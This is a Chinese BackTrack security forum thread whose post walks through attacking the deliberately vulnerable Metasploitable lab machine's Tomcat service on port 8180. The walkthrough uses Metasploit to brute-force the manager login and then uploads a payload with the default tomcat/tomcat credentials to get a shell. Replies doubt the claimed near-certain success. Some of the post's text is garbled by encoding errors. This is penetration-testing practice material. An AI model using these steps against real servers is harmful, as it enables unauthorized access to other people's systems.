最新的backtrack5(bt5)官方网站已经提供下载,backtrack5是基于ubuntu Lucid LTS. 内核2.6.38开发的,完全开源并和GPL兼容。

Backtrack 中文网

 找回密码
 立即注册

QQ登录

只需一步,快速开始

扫一扫,访问微社区

搜索
查看: 2082|回复: 5

[分享] Metasploitable 靶C一用百百中的漏洞

[复制链接]
琛振
张简玉轩
我使用 samba 漏洞 反shell 有r後 br /> 後碛 nexpose 咭幌y後又一可用漏洞,缀醢侔l百中。

例:
目酥CIP 192.168.1.104
tomcat 服 8180 port

L查 Tomcat ぬ/密msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > show actions
...actions...
msf auxiliary(tomcat_mgr_login) > set ACTION <action-name>
msf auxiliary(tomcat_mgr_login) > show options
set RHOSTS 192.168.1.104
set RPORT 8180
msf auxiliary(tomcat_mgr_login) > run


取得目 shell
msf > use exploit/multi/http/tomcat_mgr_upload
msf exploit(tomcat_mgr_upload) > show targets
...targets...
msf exploit(tomcat_mgr_upload) > set TARGET <target-id>
msf exploit(tomcat_mgr_upload) > show options
set RHOST 192.168.1.104
set RPORT 8180
set HttpUsername tomcat
set HttpPassword tomcat
msf exploit(tomcat_mgr_upload) > exploit



+1
2088°C
5
  • nimameijiba
  • TTZZ
  • 大学霸__IT达人
  • 康铎严
  • 猪屎一刀斩
过: 他们
欣洁
遇震博
这个你要看什么版本的tomcat的了。
淡歆美
厍欣畅
能否告知测试的过程?我们也好学习啊
尧平蓝
度承平
除了0day,基本没有百分百中的。毕竟,网管也不全是傻子。
璇采
永绿海
百分百中有点夸张了吧,测试到tomcat哪个版本?
元如风
曾笑晴
所以说各位玩家还是要学习的一个,提升自己的知识水平
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

BackTrack是一套专业的计算机安全检测的Linux操作系统,简称BT。BackTrack 是一个基于Ubuntu GNU/Linux的发行版本,主要用做数字取证和入侵测试。它的名字引用自回溯法(backtracking)。BackTrack 给用户提供了大量功能强大但简单易用的安全工具软件。BackTrack还支持Live CD和Live USB启动方式,用户可以直接从移动介质启动该系统而不用将系统安装在硬盘上。BackTrack被设计成一体化的旨在安全审计用的livecd,曾经它是被最广泛采用的渗透测试框架并被世界各地的安全社区所使用。现在,BackTrack已被Kali Linux所代替,BT将不再维护。
快速回复 返回顶部 返回列表